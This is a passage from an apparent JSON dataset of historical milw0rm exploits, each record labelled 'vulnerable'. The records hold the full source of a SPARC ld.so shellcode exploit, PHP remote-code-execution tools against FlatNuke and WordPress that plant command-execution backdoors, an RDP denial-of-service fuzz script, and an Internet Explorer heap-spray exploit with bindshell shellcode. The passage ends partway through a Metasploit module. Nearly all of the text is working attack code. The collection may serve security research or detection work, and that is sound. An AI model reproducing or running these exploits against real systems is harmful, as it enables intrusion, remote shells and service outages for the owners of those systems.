\n\n  free(buf);\n\n  \n\n  return ld_pre_env;\n\n}\n\n\n\n\n\n\n\n\n\n/* ********************************************** *\n\n * *************** GET_FAKE_FRAME *************** *\n\n * ********************************************** */\n\nchar * get_fake_frame(long offset)\n\n{\n\n  long destcpy_addr;\n\n  long *lp;\n\n  char *frame = (char *)malloc(FRAME_SIZE + 1);\n\n\n\n  if(!frame)\n\n  {\n\n    perror(\"malloc\");\n\n    return 0;\n\n  }\n\n\n\n  /* this worked for me; may have to adjust though \n\n   * - can easily find a good place by using gdb and pmap */\n\n  destcpy_addr = get_strcpy_addr() + 0x17000;\n\n\n\n  lp = (long *)frame;\n\n  \n\n  /* %l regs - values don't matter */\n\n  *lp++ = 0x42454746; /* %l0 <- == \"BEGF\", use this to help locate frame's address */\n\n  *lp++ = 0xdeaddead; /* %l1 */\n\n  *lp++ = 0xdeaddead; /* %l2 */\n\n  *lp++ = 0xdeaddead; /* %l3 */\n\n  *lp++ = 0xdeaddead; /* %l4 */\n\n  *lp++ = 0xdeaddead; /* %l5 */\n\n  *lp++ = 0xdeaddead; /* %l6 */\n\n  *lp++ = 0xdeaddead; /* %l7 */\n\n\n\n  /* %i regs */\n\n  *lp++ = destcpy_addr;              /* %i0 - DESTINATION ADDRESS for ___cpy() */\n\n  *lp++ = (SHELLCODE_ADDR + offset); /* %i1 - SOURCE ADDRESS for ___cpy() */\n\n  *lp++ = 0xdeaddead;                /* %i2 - size*/\n\n  *lp++ = 0xdeaddead;                /* %i3 */\n\n  *lp++ = 0xdeaddead;                /* %i4 */\n\n  *lp++ = 0xdeaddead;                /* %i5 */\n\n  *lp++ = destcpy_addr+0x200;        /* saved frame pointer/%i6(sp) */\n\n  *lp++ = destcpy_addr-0x8;          /* %i7 */\n\n  *lp++ = 0x0;\n\n\n\n  return frame;\n\n}\n\n\n\n\n\n\n\n/* ********************************************** *\n\n * **************** GET_ENVS_STR **************** *\n\n * ********************************************** */\n\nchar * get_envs_str(char fill)\n\n{\n\n  char *envs_str = (char *)malloc(ENV_STR_SIZE + 1);\n\n  \n\n  if(!envs_str)\n\n  {\n\n    perror(\"malloc\");\n\n    return 0;\n\n  }\n\n\n\n\n\n  memset(envs_str, fill, ENV_STR_SIZE);\n\n  envs_str[0] = 'b'; // \\ \n\n  envs_str[1] = 'e'; // --- help find where we are in memory/in relation to other env variables  */\n\n  envs_str[2] = 'g'; // /  \n\n  envs_str[ENV_STR_SIZE] = '\\0';\n\n  \n\n  return envs_str;\n\n}\n\n\n\n\n\n\n\n/* ********************************************** *\n\n * *************** GET_STRCPY_ADDR ************** *\n\n * ********************************************** */\n\nunsigned long get_strcpy_addr()\n\n{\n\n  void *handle;\n\n  Link_map *lm;\n\n  unsigned long addr;\n\n\n\n  if((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL)\n\n  {\n\n    perror(\"dlmopen\");\n\n    return 0;\n\n  }\n\n\n\n\n\n  if((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1)\n\n  {\n\n    perror(\"dlinfo\");\n\n    return 0;\n\n  }\n\n\n\n\n\n  if((addr = (unsigned long)dlsym(handle, \"strcpy\")) == NULL)\n\n  {\n\n    perror(\"dlsym\");\n\n    return 0;\n\n  } \n\n  \n\n  /* -4 to skip save and use \n\n   * our fake frame instead */\n\n  addr -= 4;\n\n \n\n  /* make sure addr doesn't contain any 0x00 bytes,\n\n   * or '/' characters (as this is where strcpy will\n\n   * cutoff in ld.so.1) */\n\n  if( !(addr & 0xFF) || !(addr & 0xFF00) || \n\n      !(addr & 0xFF0000) || !(addr & 0xFF000000) ||\n\n      ((addr & 0xFF) == 0x2f) ||\n\n      ((addr & 0xFF00) == 0x2f) ||\n\n      ((addr & 0xFF0000) == 0x2f) ||\n\n      ((addr & 0xFF000000) == 0x2f) )\n\n  {\n\n    printf(\"ERROR: strcpy address (0x%x) contains unusable bytes somewhere.\\n\", addr);\n\n    printf(\"       -> consider using strncpy, memcpy, or another similar substitute instead.\\n\");\n\n    return 0;\n\n  }\n\n\n\n  return addr;\n\n}\n\n\n\n\n\n// milw0rm.com [2003-10-27]",
745        "vulnerable": true
746    },
747    {
748        "exploit_id": 1140,
749        "content": "<?php\n\n/* Aug 2005, 4th\n\n   Flatnuke 2.5.5 (possibly prior versions) remote code execution\n\n   by rgod\n\n   site: http://rgod.altervista.org\n\n\n\n   thanks to UlisseHacker... :)\n\n\n\n   make these changes in php.ini if you have troubles\n\n   with this script:\n\n   allow_call_time_pass_reference = on\n\n   register_globals = on\t\t\t\t\t\t       */\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho '<head><title>FlatNuke 2.5.5 remote commands execution</title>\n\n      <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\n\n      <style type=\"text/css\">\n\n      <!--\n\n      body,td,th {color: #00FF00;}\n\n      body {background-color: #000000;}\n\n      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }\n\n      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\n\n\t       font-weight: bold;\n\n\t       font-style: italic;\n\n              }\n\n      -->\n\n      </style></head>\n\n      <body>\n\n<p class=\"Stile6\">FlatNuke 2.5.5 (possibly prior versions) remote commands execution</p>\n\n<p class=\"Stile6\">a script by rgod at <a href=\"http://rgod.altervista.org\" target=\"_blank\">http://rgod.altervista.org</a></p>\n\n<table width=\"84%\" >\n\n  <tr>\n\n    <td width=\"43%\">\n\n     <form name=\"form1\" method=\"post\" action=\"'.$SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value\">\n\n      <p>\n\n       <input type=\"text\" name=\"host\">\n\n      <span class=\"Stile5\">hostname (ex: www.sitename.com) </span></p>\n\n      <p>\n\n        <input type=\"text\" name=\"path\">\n\n        <span class=\"Stile5\">path (ex: /flatnuke/forum/ or /forum/ just /) </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"port\">\n\n        <span class=\"Stile5\">specify a port other than 80 (default value) </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"command\">\n\n        <span class=\"Stile5\">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>\n\n      <p>\n\n      <input type=\"text\" name=\"proxy\">\n\n        <span class=\"Stile5\">send exploit through an HTTP proxy (ip:port)  </span></p>\n\n      <p>\n\n          <input type=\"submit\" name=\"Submit\" value=\"go!\">\n\n      </p>\n\n    </form></td>\n\n  </tr>\n\n</table>\n\n</body>\n\n</html>';\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>  </td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>  </td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\n\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>''))\n\n{\n\nif ($port=='') {$port=80;}\n\n$data=\"op=reg&nome=jimyhendrix\u00aepass=jimihendrix&reregpass=jimihendrix&anag=jimihendrix&email=jimihendrix@email.com&homep=\".urlencode('http://www.asite.com').\"&prof=artist&prov=whereimfrom&ava=clanbomber.png&url_avatar=&firma=\".chr(13).urlencode('system($HTTP_GET_VARS[command]);');\n\n\n\nif ($proxy=='')\n\n       {$packet=\"POST \".$path.\"index.php HTTP/1.1\\r\\n\";}\n\nelse\n\n       {\n\n        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);\n\n        if ($c==0) {\n\n                    echo 'check the proxy...<br>';\n\n\t            die;\n\n\t           }\n\n         else\n\n        {$packet=\"POST http://\".$host.$path.\"index.php HTTP/1.1\\r\\n\";}\n\n        }\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"index.php?op=vis_reg\\r\\n\";\n\n$packet.=\"Accept-Language: it\\r\\n\";\n\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n\n$packet.=$data;\n\n\n\nshow($packet);\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nwhile ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\nif ($proxy=='')\n\n       {$packet=\"GET \".$path.\"users/jimyhendrix.php?command=\".urlencode($command).\" HTTP/1.1\\r\\n\";}\n\nelse\n\n       {\n\n        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);\n\n        if ($c==0) {\n\n                    echo 'check the proxy...<br>';\n\n\t            die;\n\n\t           }\n\n         else\n\n        {$packet=\"GET http://\".$host.$path.\"users/jimyhendrix.php?command=\".urlencode($command).\" HTTP/1.1\\r\\n\";}\n\n        }\n\n\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet);\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\n\n\nif ($proxy=='')\n\n{    $data='';\n\n     while (!feof($fp))\n\n     {\n\n      $data.=fgets($fp);\n\n     }\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\n\n\nfclose($fp);\n\n\n\nif (eregi('HTTP/1.1 200 OK',$data))\n\n    {echo 'Exploit sent...<br> If Flatnuke is unpatched and vulnerable <br>';\n\n     echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';\n\n    }\n\nelse\n\n    {echo 'Error, see output...';}\n\necho nl2br(htmlentities($data));\n\n}\n\n\n\n?>\n\n\n\n# milw0rm.com [2005-08-08]",
750        "vulnerable": true
751    },
752    {
753        "exploit_id": 1142,
754        "content": "<?php\n\n    echo \"Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\\n\";\n\n    echo \"(C) Copyright 2005 Kartoffelguru\\n\\n\";\n\n    echo \"[!] info: requires register_globals turned on on target host\\n\\n\";\n\n    if (!extension_loaded('curl')) {\n\n        die (\"[-] you need the curl extension activated...\\n\");\n\n    }\n\n\n\n    function usage()\n\n    {\n\n        die (\"usage:\\n\\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\\\"uname -a;id\\\");'\\n\\n\");\n\n    }\n\n\n\n    $options = getopt(\"h:c:\");\n\n    if (count($options) < 1 || !isset($options['h'])) {\n\n        usage();\n\n    }\n\n\n\n    $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);\n\n    $cmd  = (is_array($options['c']) ? $options['c'][0]:$options['c']);\n\n\n\n    if (!preg_match(\"/^http:\\/\\//\", $host, $dummy)) {\n\n        usage();\n\n    }\n\n\n\n    if (strlen(trim($cmd))==0) {\n\n        $cmd = 'phpinfo();';\n\n    }\n\n\n\n    $code = base64_encode($cmd);\n\n    $cnv = \"\";\n\n    for ($i=0;$i<strlen($code); $i++) {\n\n        $cnv.= \"chr(\".ord($code[$i]).\").\";\n\n    }\n\n    $cnv.=\"chr(32)\";\n\n\n\n    $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');\n\n\n\n    $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';\n\n    $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';\n\n    $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';\n\n    $cookie.=$str;\n\n    $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';\n\n    $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';\n\n    $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';\n\n\n\n    $ch = curl_init();\n\n    curl_setopt($ch, CURLOPT_URL, $host);\n\n    curl_setopt($ch, CURLOPT_POST, 0);\n\n    curl_setopt($ch, CURLOPT_COOKIE, $cookie);\n\n    curl_setopt($ch, CURLOPT_HEADER, 0);\n\n    curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);\n\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n\n    curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\");\n\n    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);\n\n    echo \"[+] now executing\\n\\n\";\n\n\n\n    $r = curl_exec($ch);\n\n    curl_close($ch);\n\n\n\n    echo $r;\n\n\n\n?>\n\n\n\n// milw0rm.com [2005-08-09]",
755        "vulnerable": true
756    },
757    {
758        "exploit_id": 1143,
759        "content": "// get SPIKE here: http://www.immunitysec.com/resources-freesoftware.shtml /str0ke\n\n//\n\n// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS\n\n// \n\n// Discovered by: \n\n// Tom Ferris\n\n// tommy[at]security-protocols[dot]com\n\n//\n\n// Tested on:\n\n// Microsoft Windows XP SP2\n\n// \n\n// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0\n\n// \n\n// 8/9/2005 Security-Protocols.com\n\n//\n\n// This program is free software; you can redistribute it and/or modify it under \n\n// the terms of the GNU General Public License version 2, 1991 as published by\n\n// the Free Software Foundation.\n\n\n\ns_block_start(\"packet_1\");\n\ns_string_variable(\"03\");\n\ns_binary(\"03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A\");\n\ns_binary(\"03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A\");\n\ns_string_variable(\"\");\n\ns_binary(\"41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41\");\n\ns_string_variable(\"\");\n\ns_block_end(\"packet_1\");\n\n\n\ns_block_start(\"packet_2\");\n\ns_int_variable(0x0500,5);\n\ns_block_end(\"packet_2\");\n\n\n\ns_block_start(\"packet_3\");\n\ns_binary(\"000002020000\");\n\ns_string_variable(\"\");\n\ns_block_end(\"packet_3\");\n\n\n\n// milw0rm.com [2005-08-09]",
760        "vulnerable": true
761    },
762    {
763        "exploit_id": 1144,
764        "content": "<!--\n\nplaced into html for your testing. /str0ke\n\n\n\n#!/usr/bin/perl\n\n#######################################################\n\n# \n\n# Internet Explorer COM Objects Instantiation Proof of Concept Exploit (MS05-038)\n\n#\n\n# Bindshell on port 28876 - Based and ripped from Berend-Jan Wever's IE Exploit\n\n#\n\n# Vulnerable Objects :\n\n# \n\n# 3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5 (blnmgr.dll) <- Exploited here\n\n# 860BB310-5D01-11D0-BD3B-00A0C911CE86 (devenum.dll)\n\n# E0F158E1-CB04-11D0-BD4E-00A0C911CE86 (devenum.dll)\n\n# 33D9A761-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)\n\n# 4EFE2452-168A-11D1-BC76-00C04FB9453B (devenum.dll)\n\n# 33D9A760-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)\n\n# 33D9A762-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)\n\n# 083863F1-70DE-11D0-BD40-00A0C911CE86 (devenum.dll)\n\n# 18AB439E-FCF4-40D4-90DA-F79BAA3B0655 (diactfrm.dll)\n\n# 31087270-D348-432C-899E-2D2F38FF29A0 (wmm2filt.dll)\n\n# D2923B86-15F1-46FF-A19A-DE825F919576 (fsusd.dll)\n\n# FD78D554-4C6E-11D0-970D-00A0C9191601 (dmdskmgr.dll)\n\n# 52CA3BCF-3B9B-419E-A3D6-5D28C0B0B50C (browsewm.dll)\n\n# 01E04581-4EEE-11D0-BFE9-00AA005B4383 (browseui.dll)\n\n# AF604EFE-8897-11D1-B944-00A0C90312E1 (browseui.dll)\n\n# 7849596A-48EA-486E-8937-A2A3009F31A9 (shell32.dll)\n\n# FBEB8A05-BEEE-4442-804E-409D6C4515E9 (shell32.dll)\n\n# 3050F391-98B5-11CF-BB82-00AA00BDCE0B (mshtml.dll)\n\n# 8EE42293-C315-11D0-8D6F-00A0C9A06E1F (inetcfg.dll)\n\n# 2A6EB050-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# 510A4910-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# 6D36CE10-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# 860D28D0-8BF4-11CE-BE59-00AA0051FE20 (infosoft.dll)\n\n# 9478F640-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# B0516FF0-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# D99F7670-7F1A-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# EEED4C20-7F1B-11CE-BE57-00AA0051FE20 (infosoft.dll)\n\n# C7B6C04A-CBB5-11D0-BB4C-00C04FC2F410 (query.dll)\n\n# 85BBD920-42A0-1069-A2E4-08002B30309D (syncui.dll)\n\n# E846F0A0-D367-11D1-8286-00A0C9231C29 (clbcatex.dll)\n\n# B4B3AECB-DFD6-11D1-9DAA-00805F85CFE3 (clbcatq.dll)\n\n# ECABB0BF-7F19-11D2-978E-0000F8757E2A (comsvcs.dll)\n\n# 466D66FA-9616-11D2-9342-0000F875AE17 (msconf.dll)\n\n# 67DCC487-AA48-11D1-8F4F-00C04FB611C7 (msdtctm.dll)\n\n# 00022613-0000-0000-C000-000000000046 (mmsys.cpl\n\n# D2D588B5-D081-11D0-99E0-00C04FC2F8EC (wmiprov.dll)\n\n# 5D08B586-343A-11D0-AD46-00C04FD8FDFF (wbemess.dll)\n\n# CC7BFB42-F175-11D1-A392-00E0291F3959 (qedit.dll)\n\n# CC7BFB43-F175-11D1-A392-00E0291F3959 (qedit.dll)\n\n#\n\n# Tested on : \n\n# Internet Explorer 6 on Microsoft Windows XP SP2\n\n# \n\n# Usage : perl MS05-038.pl > mypage.html\n\n# \n\n#######################################################\n\n#\n\n# This program is free software; you can redistribute it and/or modify it under\n\n# the terms of the GNU General Public License version 2, 1991 as published by\n\n# the Free Software Foundation.\n\n# \n\n# This program is distributed in the hope that it will be useful, but WITHOUT\n\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\n\n# details.\n\n# \n\n# A copy of the GNU General Public License can be found at:\n\n# http://www.gnu.org/licenses/gpl.html\n\n# or you can write to:\n\n# Free Software Foundation, Inc.\n\n# 59 Temple Place - Suite 330\n\n# Boston, MA 02111-1307\n\n# USA.\n\n#\n\n#######################################################\n\n\n\n# header\n\nmy $header = \"<html><body>\\n<SCRIPT language=\\\"javascript\\\">\\n\";\n\n\n\n# Win32 bindshell (port 28876) - SkyLined\n\nmy $shellcode = \"shellcode = unescape(\\\"%u4343\\\"+\\\"%u4343\\\"+\\\"%u43eb\".\n\n\"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea\".\n\n\"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7\".\n\n\"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b\".\n\n\"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64\".\n\n\"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c\".\n\n\"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe\".\n\n\"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0\".\n\n\"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050\".\n\n\"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6\".\n\n\"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650\".\n\n\"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa\".\n\n\"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656\".\n\n\"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1\".\n\n\"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353\".\n\n\"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353\".\n\n\"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe\".\n\n\"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff\".\n\n\"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\\\");\\n\";\n\n\n\n# Memory \n\nmy $code = \"bigblock = unescape(\\\"%u0D0D%u0D0D\\\");\\n\".\n\n\"headersize = 20;\\n\".\n\n\"slackspace = headersize+shellcode.length\\n\".\n\n\"while (bigblock.length<slackspace) bigblock+=bigblock;\\n\".\n\n\"fillblock = bigblock.substring(0, slackspace);\\n\".\n\n\"block = bigblock.substring(0, bigblock.length-slackspace);\\n\".\n\n\"while(block.length+slackspace<0x40000) block = block+block+fillblock;\\n\".\n\n\"memory = new Array();\\n\".\n\n\"for (i=0;i<750;i++) memory[i] = block + shellcode;\\n\".\n\n\"</SCRIPT>\\n\";\n\n\n\n# blnmgr.dll\n\nmy $clsid = '3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5'; \n\n\n\n# footer\n\nmy $footer = \"<object classid=\\\"CLSID:\".$clsid.\"\\\"></object>\\n\".\n\n\"Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit\\n\".\n\n\"</body><script>location.reload();</script></html>\";\n\n\n\n# print \"Content-Type: text/html;\\r\\n\\r\\n\"; # if you are in cgi-bin\n\nprint \"$header $shellcode $code $footer\"; \n\n-->\n\n\n\n<SCRIPT language=\"javascript\">\n\n shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n\n bigblock = unescape(\"%u0D0D%u0D0D\");\n\nheadersize = 20;\n\nslackspace = headersize+shellcode.length\n\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\n\nfillblock = bigblock.substring(0, slackspace);\n\nblock = bigblock.substring(0, bigblock.length-slackspace);\n\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\n\nmemory = new Array();\n\nfor (i=0;i<750;i++) memory[i] = block + shellcode;\n\n</SCRIPT>\n\n <object classid=\"CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5\"></object>\n\nMicrosoft Internet Explorer blnmgr.dll COM Object Remote Exploit\n\n\n\n\n\n# milw0rm.com [2005-08-09]",
765        "vulnerable": true
766    },
767    {
768        "exploit_id": 1145,
769        "content": "##\n\n#        Title:  Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)\n\n#    Name: php_wordpress.pm\n\n# License: Artistic/BSD/GPL\n\n#         Info: I lub metasploit yummmm (str0ke ! milw0rm.com).\n\n#\n\n# Recoded Kartoffelguru's php code for metasploit.  I love cookies. /str0ke\n\n#  \n\n#\n\n#\n\n#  - This is an exploit module for the Metasploit Framework, please see\n\n#     http://metasploit.com/projects/Framework for more information.\n\n# \n\n##\n\n\n\npackage Msf::Exploit::php_wordpress;\n\nuse base \"Msf::Exploit\";\n\nuse strict;\n\nuse Pex::Text;\n\nuse bytes;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info = {\n\n        'Name'     => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',\n\n        'Version'  => '$Revision: 1.0 $',\n\n        'Authors'  => [ 'str0ke' ],\n\n        'Arch'     => [ ],\n\n        'OS'       => [ ],\n\n        'Priv'     => 0,\n\n        'UserOpts' =>\n\n          {\n\n                'RHOST' => [1, 'ADDR', 'The target address'],\n\n                'RPORT' => [1, 'PORT', 'The target port', 80],\n\n                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\n\n                'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],\n\n                'SSL'   => [0, 'BOOL', 'Use SSL'],\n\n          },\n\n\n\n        'Description' => Pex::Text::Freeform(qq{\n\n                This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.\n\n}),\n\n\n\n        'Refs' =>\n\n          [\n\n                ['MIL', '1142'],\n\n          ],\n\n\n\n        'Payload' =>\n\n          {\n\n                'Space' => 512,\n\n                'Keys'  => ['cmd', 'cmd_bash'],\n\n          },\n\n\n\n        'Keys' => ['wordpress'],\n\n  };\n\n\n\nsub new {\n\n        my $class = shift;\n\n        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n        return($self);\n\n}\n\n\n\nsub Exploit {\n\n        my $self = shift;\n\n        my $target_host    = $self->GetVar('RHOST');\n\n        my $target_port    = $self->GetVar('RPORT');\n\n        my $vhost          = $self->GetVar('VHOST') || $target_host;\n\n        my $path           = $self->GetVar('RPATH');\n\n        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;\n\n\n\n        my $encoded = Pex::Text::Base64Encode(\"passthru(\\\"$cmd\\\");\");\n\n        $encoded =~ s/\\n//gm;\n\n\n\n        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));\n\n\n\n        $byte.=\".chr(32)\";\n\n\n\n        my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x');\n\n\n\n        $str =~ 